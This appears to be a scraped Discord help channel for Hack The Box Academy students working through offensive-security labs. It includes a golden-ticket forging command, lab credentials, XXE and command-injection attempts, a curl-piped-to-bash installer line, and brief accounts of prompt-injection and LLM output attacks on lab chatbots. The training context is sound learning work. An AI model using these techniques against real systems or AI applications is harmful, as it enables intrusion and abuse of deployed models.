#modules

1 messages Ā· Page 471 of 1

leaden island
#

still stuck on that section and wanting help

dusk holly
molten swallow
#

Holy shi, assesment on PassAttacks was awesome

#

The module wasn't that consistent for me, but the assessment - masterpiece, it was fun. Thanks for all the help!

fathom pendant
#

Run the install script line by line; its annoying but it breaks running it as a script

wooden mural
#

@fathom pendant Thank you, I just found the creds (even tho I knew it was like in the example lol), I will be running line by line

#

thanks again

fathom pendant
#

Module is above tier 0 so im deleting your other message

green vessel
#

Is there a htb live support ?

wooden mural
#

I'm sry I didnt saw the rule

delicate void
#

Are we able to ask questions here about specific aspects of labs in the HTB Academy?

compact patrolBOT
fathom pendant
delicate void
fathom pendant
delicate void
#

Ok, I will message you

potent plover
#

Hi, Samuel, I am doing this seccion

potent plover
#

Hi Everyone, I am trying to do RDP and SOCKS Tunneling with SocksOverRDP, but I have a problem with this section, I execute the dll and it was successfull, but when I try to connect by RDP to the machine 1, I have the message "Remote Desktop cant connect to the remote computer"
I am in the pivote windows
kali - 10.10.14.205
pivote windows - 10.129.X.X (I did all and was ok, but I cant connect to machine 1 by RDP)
machine 1 - 172.16.5.19 victor:pass@123
machine 2 - 172.16.6.155 jason:WellConnected123!

#

how can I connect to 172.16.5.19 from windows pivote 10.129.X.X?

fathom pendant
remote yoke
#

Hello, I have a question regarding understanding Log Sources & Investigating with Splunk. The question asks: "find through an SPL search against all data the account name with the highest amount of Kerberos authentication ticket requests." While I got the answer I am unsure regarding the difference between event ID 4768 and 4769 and why they both give vastly diff answers.

waxen totem
# remote yoke Hello, I have a question regarding understanding Log Sources & Investigating wit...

4768 is TGT request and 4769 is TGS request.

Essentially:
4768 - First Kerberos Authentication request.
4769 - Subsequent Kerberos Authentication requests to other services. (which in this case the logged account name also shows the services they'd be accessing)

The users can use the same TGT to get multiple TGSs depending on how long the TGT is valid for which creates the difference in counts.

remote yoke
#

Ohhh ok that makes sense

#

Thanks

uneven yarrow
#

Can anyone help me with the Prompt Injection Attacks Skills Assessment ? I have successfully removed the CEO, not been flagged as malicious using the admin panel and made the LLM output a summary with no flag.

jovial walrus
#

SocksoverRDP - can someone help me with this?

lusty terrace
#

I am doing SQLMAP ESSENTIALS - attacking tuning for the first question I got the flag but it's not right the hint says to run it multiple times and I did but it still give the same in correct format at the end `A7}

fathom pendant
cloud thicket
#

Hi! Stuck on LLM Output Attacks Skills Assessment (LLMPics).

Got admin_key via SQLi on Imagebot, accessed Adminbot.
Tried command injection on calculate_shipment_time - get "Invalid JSON response" but can't see output.

Hint says "Pay attention to function names and admin username" - what am I missing?

west zodiac
#

Module Name: Active Directory Enumeration & Attacks > Attacking Domain Trusts - Child -> Parent Trusts - from Windows
Im unable to Perform ExtraSids Attack even though i match the requirements and got klist same

.\Rubeus.exe golden /rc4:9d765b482771______97411065964d5f /domain:LOGISTICS.INLANEFREIGHT.LOCAL /sid:S-1-5-21-2806153819-209893948-922872689 /sids:S-1-5-21-3842939050-3880317879-2865463114-519 /user:hacker /ptt
...
[] Generating EncTicketPart
[] Signing PAC
[] Encrypting EncTicketPart
[] Generating Ticket
[] Generated KERB-CRED
[] Forged a TGT for 'hacker@LOGISTICS.INLANEFREIGHT.LOCAL'
...
[] base64(ticket.kirbi):

  doIF0zC....C5MT0NBTA==

[+] Ticket successfully imported!

PS C:\Tools> klist
Current LogonId is 0:0xc67b4

Cached Tickets: (1)

#0> Client: hacker @ LOGISTICS.INLANEFREIGHT.LOCAL
Server: krbtgt/LOGISTICS.INLANEFREIGHT.LOCAL @ LOGISTICS.INLANEFREIGHT.LOCAL
KerbTicket Encryption Type: RSADSI RC4-HMAC(NT)
Ticket Flags 0x40e00000 -> forwardable renewable initial pre_authent
Start Time: 1/29/2026 22:08:31 (local)
End Time: 1/30/2026 8:08:31 (local)
Renew Time: 2/5/2026 22:08:31 (local)
Session Key Type: RSADSI RC4-HMAC(NT)
Cache Flags: 0x1 -> PRIMARY
Kdc Called:

But when i ls to try to access it shows:
ls \\academy-ea-dc01.inlanefreight.local\c$
ls : Access is denied
At line:1 char:1

  • ls \academy-ea-dc01.inlanefreight.local\c$
  •   + CategoryInfo          : PermissionDenied: (\\academy-ea-dc01.inlanefreight.local\c$:String) [Get-ChildItem], UnauthorizedAccessException
      + FullyQualifiedErrorId : ItemExistsUnauthorizedAccessError,Microsoft.PowerShell.Commands.GetChildItemCommand
    
    

ls : Cannot find path '\academy-ea-dc01.inlanefreight.local\c$' because it does not exist.
At line:1 char:1

  • ls \academy-ea-dc01.inlanefreight.local\c$
storm elk
jovial walrus
#

need a lil help with skills assessment on pivoting tunneling

jovial walrus
#

struggled a lot with rdp throughout the module,,,proxychains and rdp do not seem to go hand in hand

dusk holly
jovial walrus
#

can u pls help me with skills assessment

#

i cant rdp😭

dusk holly
mellow raven
#

Hello everyone

#

Could someone help me this question? I'm leaning about basic knowledge then, The website instructs about ParrotOS Security System but It doesn't have HTB - your own personalized Pwnbox option. so how can I get this.

sinful tide
#

Anyone who did the introduction to windows evation module ?

heady hazel
#

Windows Lateral Movement, Skill Assessment, Q5 "What is the password for VNC?"
I am trying to craft a payload on ||WSUS||, but I get error: "Function error - FbGetComputerTarget. Error Message: The EXECUTE permission was denied on the object 'fnGetComputerTargetID', database 'SUSDB', schema 'dbo'."

any hint? thank you šŸ™‚

EDIT: it looks like this is not a "blocking" error message... I was able to push the update anyway šŸ™‚

jovial walrus
#

I am never able to rdp with proxychains when using dynamic port forwarding..any idea why?
Someone suggested to use pwnbox for this skills assessment but still tryna find root cause

gray yacht
#

Please refrain from posting content from modules above Tier 0. A spoiler tag does nothing.

gray yacht
sinful tide
gray yacht
gray yacht
sinful tide
night wolf
#

Trilocor

eternal vigil
#

Heyyy, In SQLMap Case#5 under Attack Tuning i got the flag but it is saying incorrect, can anyone please recheck it for me in DMs ?

gray yacht
eternal vigil
gray yacht
stuck epoch
#

Hey what happened to Parrot os HTB edition

#

I can't find it on the website

mellow raven
coarse pine
#

Hello

#

can I download the content of the modules?

hollow path
#

Hii all

coarse pine
#

hi

gray yacht
# coarse pine Hello

Everything you posted in this channel, aside from the question about downloading the content of the modules was not necessary or related to any HTB academy modules or sections.

gray yacht
gray yacht
#

Quit spamming this channel. You can ask support if you need more information than what I have provided.

cloud urchin
gray yacht
dull plover
#

Peace guys, I’m currently stuck on module ā€œJavaScript Obfuscationā€ I’m on the 2nd flag and it’s not accepting my answer. I’ve put HTB {} and nothing. Any tips?

lime cosmos
#

same problem how did u slove it ?

weak knoll
#

Hello, i might need some help with the Unrestricted resource Consumption part of the API attacks module. Not sure how much i can share to avoid spoiling the module, but my approach has been similar to the broken authentication section, trying to fuzz the OTP.

steel canyon
sinful tide
fresh moth
#

a quick doubt inorder to access the linux machine the modules in ad section mention us to rdp into Ms01 then ssh into 172.16.5.225 with the credentials htb-student:HTB_@cademy_stdnt! .. this seems not to be working .. any idea?

#

in Active Directory Enumeration & Attacks module

winged star
#

i dont know if this is the right place to ask but my module 'html POST' is not resolving cloudfare and seems to break and show errors in dev tools. pinging cloudfare has 0 packet loss within vm. has this been an issue before?

fathom pendant
civic sinew
#

Hi all, I am stuck at the thick client assignment in cwes. When I start xbug64 and want to select an address it keeps moving. I tried to pause all threads, paused all selected data without any result
I also cannot find a way to filter on MAP and RW
Tried perplexity ans chatgpt to help. No luck. Can someone point me in the right direction? Thanks already

wooden canopy
#

Hey I'm on the Kerberos Attack - Skill assessment part can i dm someone to get help ?

potent plover
stray creek
#

I am currently doing the PMKID Attack section of the Attacking WPA/WPA2 Wi-Fi Networks module, I successfully cracked the hash with hashcat but when I provide it as the flag it does not get accepted.

cloud urchin
#

Try manually typing, make sure no whitespace etc

stray creek
#

Lol now after refreshing the page suddenly the question is marked as complete šŸ˜‚

warm horizon
#

Hi everyone, hope you’re doing well.

I’m working on a lab involving Tiny File Manager, and according to the module, the expected vulnerability is Command Injection, so that’s what I’ve been focusing on.

What I’ve done so far:

Identified that the Advanced Search feature sends an AJAX POST request.

Intercepted the request with Burp and confirmed parameters such as content, path, type=search, and ajax=true.

Tried multiple inputs and variations while observing response behavior, timing, and errors, but I haven’t seen any clear indication of command execution yet.

Reset the instance to rule out caching or a broken environment.

At this point, I’m struggling to understand where command execution might occur in this feature, or what kind of behavior I should be looking for to confirm a successful injection.

If anyone could provide a conceptual hint or point me in the right direction (without spoilers), I’d really appreciate it.

Thanks in advance for your help.

hard patio
#

Hey everyone. A little stuck on the Linux Forensics course. Anyone have an idea about this q? "What is a session uuid(-U) for a meterpreter agent? Provide answer as base64 encoded value."

undone kindle
#

hey yall, I've launched an instance and was trying to log in via SSH but it keeps timing out. I have tried resetting the target twice but that doesn't change anything, has anyone run into this and have a fix?

hard patio
undone kindle
#

not annoying at all, only been at this a few weeks! Im using the Pwnbox.

#

I also tried resetting the instance, and that doesn't seem to have fixed anything.

hard patio
undone kindle
hard patio
# undone kindle Its just sitting, I assume it will come back timed out. my PC was updated last ...

If you are on the pwnbox your computer shouldnt matter as the pwnbox should be running on a network that has access to it. you could restart both the target and pwnbox. Otherwise you could see if the pwnbox has a route to that server by typeing "route". From there you could ping the gateway for that ip range to see if maybe the gateway is down..... actually as I say all of this... It may be easier to try to switch to a different location for the pwnbox (maybe something funky is going on). Also make sure you arent supposed to ssh into a non-standard port maybe?

undone kindle
#

i have tried resetting the target and pwnbox a few times now with no luck, and if i terminate it ill have to wait for tomorrow (because im poor, lol), so changing locations would have to wait as well.
I pinged the gateway and it seems to be going through just fine.

undone kindle
#

today is probably a wash. it going to time out in 30 minutes. If it doesn't work tomorrow I may try setting up for the VPN method.

obsidian prairie
# undone kindle in terms of "ssh into a non-standard port" I dont see any instructions along tha...

if it says to connect using a non standard port then sometimes there are no instructions and its good to learn each of the flags you can with the tools that you are to use. if it says to use another port then this could be why its not working because your command is for the default port since its not specified in your command. for example. your command should be:

ssh -p <portnumber> htb-student@10.129.16.151

the default port is 22

sterile solstice
#

Did anyone ever find an answer to this? I'm having the exact same problem

proper oar
#

Unfortunately I do not remember lol that was a long time ago

sterile solstice
#

🄲

#

from what i can see no one ever answewred you back then either lol

calm swan
#

hello there,
in the Web Attacks module, under XXE - Advanced File Disclosure, I’m trying to understand a specific behavior.

why are we able to retrieve files like the /flag.php or /etc/hosts, but not /etc/passwd, whether using file://, php://filter/..., or even a combination of error-based XXE + CDATA (file:// one)?

the only method I’ve found that successfully exfiltrates /etc/passwd via error-based XXE is the following multi-step approach:

  • first, trigger an error-based XXE using a reference to a non-existent file
  • then, redirect the entity to a joiner (commonly named joined)
  • wrap the output using a CDATA payload
  • inside the CDATA file, use php://filter for encoding

is there like a specific parsing or encoding constraint that explains why the simpler approaches fail for /etc/passwd but work for other files?

sterile solstice
# gray yacht I used ligolo

thats how the module is structured. you use ligolo to setup the tunnel inside the internal network, and ntlmrelayx setups a socks server

gray yacht
sterile solstice
#

no, i was. thats part of the attack chain

gray yacht
#

Try some of the first things covered in that section.

sterile solstice
#

ligolo gives access to ntlmrelayx, ntlmrelayx's attack sets up a socks proxy, so you use proxychains4 as to connect via mssqlclient

gray yacht
gray yacht
sterile solstice
#

yea

gray yacht
sterile solstice
#

netlmrelay worked. then the next step is to connect via mssqlclient

hidden trellis
gray yacht
fathom pendant
hexed oyster
#

Hey all: working on the ⁨attacking common applications -> Exploiting Web Vulnerabilities in Thick-Client Applications⁩ I've modded the server on the fatty-client and logged in. I'm at the point where I have to modify the code again in a "test.java" file. It has the a bunch these comments at the front of the line, and it's been a while since I've written java code. Will those comments at the front of the line cause problems?

waxen totem
woven zenith
#

I have question for any course from silver annual subscription. does the completed course will be forever accessible to me once completed them like it was buying with cubes? or it access will expire once the annual subscription ends? thank you.

cloud urchin
woven zenith
#

Does it included access to exercises and assessment too? I can keep accessing them to practice, recall the lesson even after the subs expires?

cloud urchin
#

the entire module is unlocked forever, everything included

#

just complete the module 100%

woven zenith
#

That's wonderful.ā¤ļø

hard patio
#

Hey everyone. A little stuck on the Linux Forensics course. Anyone have an idea about this q? "What is a session uuid(-U) for a meterpreter agent? Provide answer as base64 encoded value."

fathom pendant
woven zenith
#

I have some confusion in the reporting following the method for using sysreptor's reporting suggestion. which one should be filled out?

jovial walrus
#

once again trying the skills assessment on pivoting module and I cant manage to rdp with proxychains ...am using ssh dynamic port forwarding

#

can anyone pls help me out

woven zenith
jovial walrus
#

we gotta pivot to the discovered host, 172.16.5.35, and submit the contents of C:\Flag.txt

#

port 3389 is open on this internal host

#

[proxychains] Strict chain ... 127.0.0.1:9050 ... kerberos.mit.edu:88 <--socket error or timeout!
[proxychains] Strict chain ... 127.0.0.1:9050 ... kerberos-1.mit.edu:88

xfreerdp is trying to contact external Kerberos servers (MIT's public Kerberos servers) through SOCKS proxy, which is timing out.

woven zenith
#

if its me, I will try another pivoting method

jovial walrus
acoustic owl
lusty terrace
#

bruh I finished everything for the SQLMAP BESIDE Flag 5 last time it didn't give any answer now it's just not there at all lmao

#

nvm I had to restart and try a couple of times

#

jezz

tender parcel
#

Hello everyone, where can I ask questions to get help with unsolved problems in the Academy modules?

acoustic owl
#

You can ask here. If someone can help you, they will get in touch with you.

tender parcel
#

Thank you. Since this is my first question, please let me know right away if there are any precautions I should be aware of.

acoustic owl
#

Ask your question in this way.
I am on module X, section Y. I am stuck on question Z. I have tried various things that were discussed in the module, but I am stuck. Who can help me?

dry halo
#

⁨```
If we disable port scan (-sn), Nmap automatically ping scan with ICMP Echo Requests (-PE). Once such a request is sent, we usually expect an ICMP reply if the pinging host is alive. The more interesting fact is that our previous scans did not do that because before Nmap could send an ICMP echo request, it would send an ARP ping resulting in an ARP reply. We can confirm this with the "--packet-trace" option. To ensure that ICMP echo requests are sent, we also define the option (-PE) for this.


if -sn is enabled nmap sends ICMP Echo Request automatically but before that it sends ARP ping is sent

I don't understand ⁨`we ensure part`⁩ here  
why put -PE again since itr automatically sends ICMP Echo by default?

https://academy.hackthebox.com/module/19/section/101
untold flint
#

.

#

Hi everyone, Is there an issue with the Active Directory Enumeration & Attacks machine? I cannot ssh ino it.

distant tide
#

Can’t rdp into the machines in this module ā€œWindows Event Logs & Finding Evilā€ i’m using the pwnbox and i’ve also tried using the vpn but i still get the ā€œInvalid Sigil errorā€

#

I’m also using the provided command to rdp into the session but it is still not working

distant tide
thin hearth
#

How can we reduce the lag on academy, everyone? I feel very frustrated because of the lag (especially when remoting into machines via RDP).

jovial walrus
#

just finished skills assessment for pivoting
I am trying to understand how we have 2 diff interfaces here when they would quite possibly have the same ip addresses on both ? both have subnet masks 255.255.0.0 so both gonna have 172.16.0-255.0-255 or 172.16.0.0/16 ip address

olive depot
#

Is there any problems with HTB servers? doing some modules, but when i spawn a "instance" (Pwnbox) for the labb, i can reach it for the first 30 secs then its cuts all out.

charred mountain
rustic geode
#

Hi i need a hint for Credential Hunting in Network Shares

olive depot
fathom pendant
#

Iirc snaffler did the trick for me

fathom pendant
rustic geode
fathom pendant
#

Gimme a sec to pull it up and remind myself how I went through it.

rustic geode
#

ok thanks

charred mountain
#

I don't know for @olive depot , but for me the problem is inside the AD lab. The Pwnbox is OK.

#

After connecting to the target machine via SSH, the system crashes after executing a few commands.

fathom pendant
# rustic geode ok thanks

The first Question; the hint is in the question domain think of how domain usernames are structured
The Second Question; similarly the hint is in the question asking you for Domain Administrator
Both will require some filtering to find

rustic geode
#

okay thanks i will try

fathom pendant
#

The second requires the credentials you find from the first as an fyi

fathom pendant
#

I will say the powershell method ends up being a lot faster; but it works just the same with nxc

cloud urchin
rustic sage
#

Hey, Anyone knows how much the AD Penetration Tester path costs if I’m using the Gold monthly subscription?

potent pier
#

Yes.
(Total path cost / monthly cube gain) * monthly price

dense agate
#

just completed the nmap module

#

the IDS stuff was pretty fun and not as bad as I expected

jovial walrus
vast seal
#

Alright I've been putting together my AD enumeration and attack methodology. Ripped it from a few youtubers and from my own notes. Am I missing something?

errant silo
#

those were so hard for me

cloud urchin
dense agate
fathom pendant
#

@lime cosmos AEN is above tier 0, I dont recall running into too many restrictions.

brittle kestrel
#

Windows Lateral Movement -----> Windows Server Update Services (WSUS)

#

i'am facing this issue even tho i have done multiple reset on the lab

#

weird ... anyone faced this issue before in the module or know a possible fix ?

#

šŸ‘€ another reset for sanity check and still same issue !!!!

cloud urchin
#

Are you running it on the correct machine?

fickle falcon
#

Hey Y'all. I am working on the "Shells and Payloads" module, "The Live Engagement" in htb Academy, on the Penetration tester path. After starting VMs and RDP into the target, which is a MATE desktop environment there is no web browser? I've tried this over my VPN connection w/kali and the Pwnbox. In the walkthrough Host-1 hint: it says to " if you look at status.inlanefreight.local or browse to the IP on port 8080" But there is no web browser, there is a TOR browser but the box is not internet connected. And I used RDP to the Foothold host. Any help would be appreciated...

cloud urchin
#

that's not a public host, so you should be able to connect to it if you can resolve it. maybe try firefox-esr?

fickle falcon
#

Cool. i was able to use firefox from the command line, thank you!

jovial walrus
fathom pendant
jovial walrus
vast cairn
#

hey all. I"m having an issue in the WEP module, with the ARP Replay Attack section. I've followed all the steps, but when I run the aircrack on WEP-01.cap, it's running into a segmentation fault and doesn't find the key. It also only finds only a handful of IVs, instead of in the example where it finds 97822 out of 95000 (which I have questions about, mathematically speaking).

#

I've restarted the terminal something like 7 times, and it has this issue every time

sterile solstice
#

MSSQL, Exchange, SCCM skill assessment: I need a nudge on Q3 if anyone can help

sterile solstice
#

255.255.0.0 is /16. Just as 255.255.255.0 is /24. or 255.0.0.0 is /8. as you can see, there is a partner. it can be confusing as to how a subnet mask works, but the short answer is you are allocating bits to the host and client. NetworkChuck does a good video on YT on it if you're interested.

jovial walrus
waxen totem
dusk holly
#

Active Directory Enumeration & Attacks module, Skills assessment part 1
after gaining administrative privileges on || MS01 || i can't seem to find answer for question 4
⁨⁨```
Find cleartext credentials for another domain user. Submit the username as your answer.

it feels like i tried everything but still could not get it, any nudge would be appreciated
haughty fiber
#

PRTG Network Monitor cant get a code execution to work i think

#

can anyone help

dusk holly
#

nevermind, i got it i am not sure but i didn't see this method in this particular module, but anybody who is wondering the answer, revisit password attacks module

civic inlet
haughty fiber
#

Attacking Common Applications

civic inlet
#

probs DM me dont wanna spoil

mint lodge
#

I am on Windows escalation skill assesment p1, trying to run exploit suggester but its not working for me:
⁨⁨```
python2.7 windows-exploit-suggester.py
--database 2026-01-31-mssb.xls
--systeminfo sysinfo

⁩
I just pasted the output of the systeminfo file to sysinfo.

This is the error I am getting:
⁨```
[*] initiating winsploit version 3.3...
[*] database file detected as xls or xlsx based on extension
[*] attempting to read from the systeminfo input file
[+] systeminfo input file read successfully (ascii)
[-] unable to determine the windows versions from the input file specified. consider using --ostext option to force detection (example: --ostext 'windows 7 sp1 64-bit')
```⁩

Is it just not recognizing the system version from the output?
fathom pendant
#

So some other logic is taking place to segment it

waxen totem
fathom pendant
#

Its really dumb though

waxen totem
fathom pendant
#

And definitely confusing to people that have a base knowledge of segmentation

fathom pendant
waxen totem
fathom pendant
#

Reminds me i need to set a static ip for my dad's printer

waxen totem
fathom pendant
fathom pendant
waxen totem
fathom pendant
#

Yeah, it works fine as is

civic inlet
gloomy pawn
#

Hello, I think I need some help with information gathering - virtual hosts, is this the right place to ask questions? :)

fathom pendant
#

If you want to know what those do you can man grep and look for the options I mentioned, similarly man sort

gloomy pawn
#

so my problem is that everything seems to work but I am not getting any "found", i tried adding the target with the inlanefreight .htb /etc/hosts but it does not seem to change anything either

#

I’ve tried:

  • ffuf vHost fuzzing with -fs 116
  • matching status codes
  • comparing response hashes against the baseline
    All responses still appear identical, so I can’t isolate the correct web* etc
fathom pendant
#

How are you fuzzing for vhosts? Are you doing the -H "Host: FUZZ.inlanefreight.htb"? Secondary note; if the sizes are all the same, then that likely indicates what you need to filter out šŸ˜‰

gloomy pawn
#

Yep - I’m fuzzing using -H "Host: FUZZ.inlanefreight.htb".
I checked the default response first (size 116), and since all responses were the same initially, I filtered that size out with -fs 116 to isolate real vHosts.

indigo pendant
#

Module -> Introduction to windows command line : Skill Asessment

⁨⁨SSH to 10.129.xxx.x (ACADEMY-ICL-SKILLS11) with user "user2" and password ""⁩⁩

I just press enter when prompted for password, yet it says permission denied. Am i doing something wrong? I feel maybe I have to switch to user2 by logging in to user1 first (password for user1 is not "")

silent scaffold
#

password is the answer found in user1 question

indigo pendant
#

ty!

#

The question doesn't mention this at all

mint lodge
left needle
#

Is ⁨certi⁩ able to find the URL where CA hosts web enrollment page or is it only able to identify that whether DC has CA enabled or not

vast cairn
#

ok looking at the WEP ARP replay attack... I keep getting this segmentation fault after I run aircrack on the WEP-01.cap

rustic geode
#

hi i need a hint for the PtH question 6

gray yacht
fast quest
#

Hi Guys, I am stuck at Sliver C2 Skills Assessment. I got the administrator access on SRV09 and got the dbuser creds for DC02 and able to login through mssqlclient.py, but when i try to upload the pivot exe file to DC02 it is giving me an error, file not found. I feel some AV is blocking the connections. Can you pls point me the direction to move forward?

rustic geode
#

i followed the section

gray yacht
rustic geode
#

yes

strange aspen
#

hi can someone help me with Pivoting, Tunneling, and Port Forwarding Skills Assessment the last question i cant access the share and im confused how to continue...

rustic geode
#

Using Julio's hash, perform a Pass the H ........

dusk holly
#

Skills assessments were goated!

gray yacht
dusk holly
#

@gray yacht can i shoot you DM on what i saw in the skills assessment

west yacht
#

stuck on 'The Live Engagement' for Shells section. i uploaded cmd.war from /usr/share/laudanum/jsp to the WAR file to deploy in /manager and i'm not sure what to do next.

gray yacht
west yacht
gray yacht
west yacht
gray yacht
# west yacht

You can shoot me a DM, so we can chat a bit more freely

gray yacht
strange aspen
# gray yacht Check the privs/groups of your owned users.

no i still dont get a connection to the dc because of the two network interfaces in the solution is only mentioned to click on the share but i dont manage to get a connection my mind says i should use proxifier i dont know i actually have no clue

civic fiber
#

Anyone experienced with all labs. Wi-Fi penetration tester patch slow or lag?

gray yacht
sharp cedar
#

How do you make your notes in HTB and how do you sort it bc I am not sure if i should rewrite my notes more effizient

dull obsidian
#

Hi everyone, I'm currently busy with the Network Foundations module, and I'm getting stuck at a question in the Wireless Networks section.

Question 5 specifically, which is "What manages multiple cell towers in cellular networks? (Format: three words)". The answer is Base Station Controllers, but whenever I submit, it says that it's incorrect and I cannot complete the section.

Could someone help me please?

cloud urchin
#

@tender parcel Please take care not to post content from modules above tier 0

heady sapphire
#

Let’s say I have pivoted to an internal network via ligolo . I wanna execute a Metasploit exploit (which requires LHOST , LPORT, RHOST fields) on a target in the internal network . Is it possible to receive the Meterpreter session in my atatcking machine ? If yes how ? Which IP should I specify as LPORT and LHOST ?

gray yacht
heady sapphire
gray yacht
heady sapphire
#

Oh the reverse she’ll most probably you mean

gray yacht
heady sapphire
gray yacht
granite sandal
#

Hi everyone, im doing the Password Attacks module, Credential Hunting In Network Traffic section and i keep getting issues opening up the associated pcap file (demo.pcapng). The wireshark error says "Dissector bug: Invalid leading...". Any suggestions for how to fix?

dry halo
dusk holly
dry halo
granite sandal
granite sandal
#

thank you very much prayge

#

I needed to update Wireshark (updated to 4.6.3). Thanks everyone for the help

muted mountain
#

is it me or the academy's box are kind of slow ? I'm making sqlmap and the requests are giving timeout so I had to do the sqli manually

#

because the tool don't work with requests giving timeout over and over.

paper sandal
#

Also having this same issue. Can't find any replies to this, so does anyone know what I am missing as well? Found this talked about under CDSA. G2G

fathom pendant
#

Don't work too far ahead, each flag has a place

vast cairn
vast cairn
#

Nope, still getting a segmentation fault. I don't understand why I'm getting that.

civic fiber
hasty rock
#

SMTP Username Enumeration — Module 112 / Section 1072

Hey everyone, documenting everything I’ve done so far to avoid any missing context.

Target IP: 10.129.22.87
Service: SMTP (25)
Domain identified: YES

1ļøāƒ£ Wordlist access in HTB VM
Tried downloading the provided wordlist:
wget https://academy.hackthebox.com/storage/resources/footprinting-wordlist.txt
Result: 404 Not Found

Confirmed it doesn’t exist locally:
locate footprinting-wordlist.txt

Verified available lists:
ls /opt/useful/seclists/Usernames
Used SecLists usernames since the provided wordlist isn’t accessible in the VM.

2ļøāƒ£ smtp-user-enum (default timeout)
smtp-user-enum -M VRFY -U top-usernames-shortlist.txt -t 10.129.22.87 -p 25
smtp-user-enum -M EXPN -U top-usernames-shortlist.txt -t 10.129.22.87 -p 25
Result: 0 results

3ļøāƒ£ Increased timeout
smtp-user-enum -M VRFY -U top-usernames-shortlist.txt -t 10.129.22.87 -p 25 -w 15
Result:
root exists
mysql exists

Neither is accepted by the Academy validator.

4ļøāƒ£ Large list without domain
smtp-user-enum -M VRFY -U Names/names.txt -t 10.129.22.87 -p 25 -w 15
~10k users
Very slow
No useful results initially

5ļøāƒ£ Domain specified (works)
smtp-user-enum -M VRFY -U Names/names.txt -t 10.129.22.87 -p 25 -D inlanefreight.htb -w 15

Result: Many valid users found, e.g.:
admin@inlanefreight.htb
accounting@inlanefreight.htb
adam@inlanefreight.htb

Confirms:
VRFY works
Domain is required
Increased timeout is necessary

6ļøāƒ£ Answer attempts (failed)
Tried:
admin, admin@inlanefreight.htb
accounting, accounting@inlanefreight.htb
First enumerated users
With/without domain
None accepted by validator.

Conclusion
Enumeration method is correct
SMTP behavior understood
Results are valid
Issue appears to be answer expectation or lab validation, not technique

Looking for confirmation on the expected username format or whether the lab/validator is out of sync. Any guidance appreciated.

vast cairn
vast cairn
#

Yes, I run with sudo. I also tried going to root with sudo -s and that didn't do anything different

hasty rock
cloud urchin
#

You'll need to run the scan with the lists provided in the module's resources section. If you don't you're not going to get the answer.

hasty rock
#

Okay. I have attempted to download it, but was unable to through the local machine. Am I atleast on the right track copying the list and running automated scripts? Not sure which direction works, and this is day 6 lol.

cloud urchin
#

Not sure what you mean by local machine

#

Download it in your VM

#

or whatever

hasty rock
#

The VM for the module.

cloud urchin
#

are you using a vm or the pwnbox?

#

you can just paste the lists into nano or something on a vm or the pwnbox

#

then save it somewhere and use it

hasty rock
#

I am using pwnbox. Okay, I have tried that. Re-attempting now.

hasty rock
#

Nothing I type as the answer is ever accepted. No matter what I add or take away from the answers given. This is the question from the module. Maybe I am misinterpreting what is being asked: Enumerate the SMTP service even further and find the username that exists on the system. Submit it as the answer.

vital yarrow
#

Man i just want to cry; I was doing the " Obtain a session cookie through a valid login, and then use the cookie with cURL to search for the flag through a JSON POST request to '/search.php' " mission from Web requests POST part, and wondering why I kept getting empty results even if i was following everything correctly :/ and turned out it just didnt work for some reason on my own pc, but same command worked on the pwnbox.

#

hngh over an hour fighting for no reason when i thought I was typing something wrong

#

I wonder if it was checking the user agent and my curl was different version than pwnboxes?

waxen totem
#

Not likely, there are some targets in web modules that are only accessible on the HTB network however and you might have to be connected to the VPN to connect to them.

vital yarrow
#

idk, it was weird, all the other exercises on the module worked well from my own system's terminal, and the site itself worked on my browser so, it just left me bit confused haha.

fleet spear
winter shell
#

Hello guys ! at the Using Web Proxies , Burp Intruder i have found the admin/index.html but i cannot find the flag. is the flag on another html file?

scenic parcel
#

Hi All! Can anyone guide me on HTTPS/TLS ATTACKS module, chapter POODLE & BEAST. I've tried following the examples, but I'm getting either ⁨⁨⁨⁨⁨⁨Connection refused⁩⁩⁩⁩⁩ or ⁨⁨⁨⁨NOT_VULNERABLE⁩⁩⁩⁩⁩. Tried both vm and pwnbox. NVM, solved. That very moment when you realise you have mislead yourself LUL

warm horizon
#

Hi everyone,

I would appreciate some guidance to confirm whether I am approaching this lab correctly.

I authenticated as guest/guest and focused on the Advanced Search functionality, since this is the only feature that logically could involve system-level operations in a file manager.

I captured and analyzed the POST request used by Advanced Search and tested for command injection using multiple techniques (command separators, time-based payloads, and variations placed at the end of user input, as suggested in the hint).

However, none of the inputs resulted in execution behavior, time delays, error messages, or any output differences. The application consistently enforces input constraints (such as minimum character length) and behaves like an internal file search rather than a system command execution.

Based on this behavior, it appears that this functionality does not invoke OS commands and therefore is not vulnerable to command injection.

Could someone please confirm if the goal of this challenge is to identify the absence of command injection rather than exploit one, or point me in the right direction if I am missing another execution vector?

Thanks in advance for your time and help.

vast cairn
#

ok. So in the ongoing saga of the WEP ARP Request replay attack, I was able to get a new result after I let the airodump produce more results in the WEP-01.cap file. When I run aircrack -3 now, it runs the script without a segmentation fault. However, it's still failing to find the key... so I guess I'll try again and let the airodump go even longer?

gray yacht
heady sleet
#

Hello, I have a suggestion about something I saw in the Linux BufferOverflow Module:

Is giving us the command to set the Intel syntax as default, which is nice, but nowadays is not better to recommend to use ⁨⁨⁨⁨⁨⁨⁨GEF⁩⁩⁩⁩⁩⁩⁩ Instead?

Also the suggested command:
⁨⁨⁨⁨⁨⁨⁨⁨```sh
echo 'set disassembly-flavor intel' > ~/.gdbinit

Will over write your configuration file,  deleting  the lines ⁨⁨⁨⁨⁨⁨⁨`GEF`⁩⁩⁩⁩⁩⁩⁩ "installed" in case you had ⁨⁨⁨⁨⁨⁨⁨`GEF`⁩⁩⁩⁩⁩⁩⁩. 
⁨⁨⁨⁨⁨⁨⁨`GEF`⁩⁩⁩⁩⁩⁩⁩ comes with Intel syntax already by default.

Wouldn't being more useful to point to ⁨⁨⁨⁨⁨⁨⁨`GEF`⁩⁩⁩⁩⁩⁩⁩ directly, which is the enhanced version of ⁨⁨⁨⁨⁨⁨⁨`GDB`⁩⁩⁩⁩⁩⁩⁩ for modern days?
⁨⁨⁨⁨⁨⁨⁨⁨```sh
bash -c "$(curl -fsSL https://gef.blah.cat/sh)"
```⁩⁩⁩⁩⁩⁩⁩⁩
cyan veldt
#

im doing attacking common application module and i cant use droopescan. can anyone help

hexed oyster
#

'attacking common applications -> attacking thick-clients' is there anyway to save the newly created .jar file to my machine to 'save' my work?

#

or is that not allowed?

orchid cloak
fathom pendant
heady sleet
cyan veldt
fathom pendant
#

well if it gives errors installing the requirements, then the tool won't run

#

also, isn't it meant to be run with python2.7? at least the one they link to?

fathom pendant
cyan veldt
#

I’m confused and idk what that is tbh šŸ˜…

#

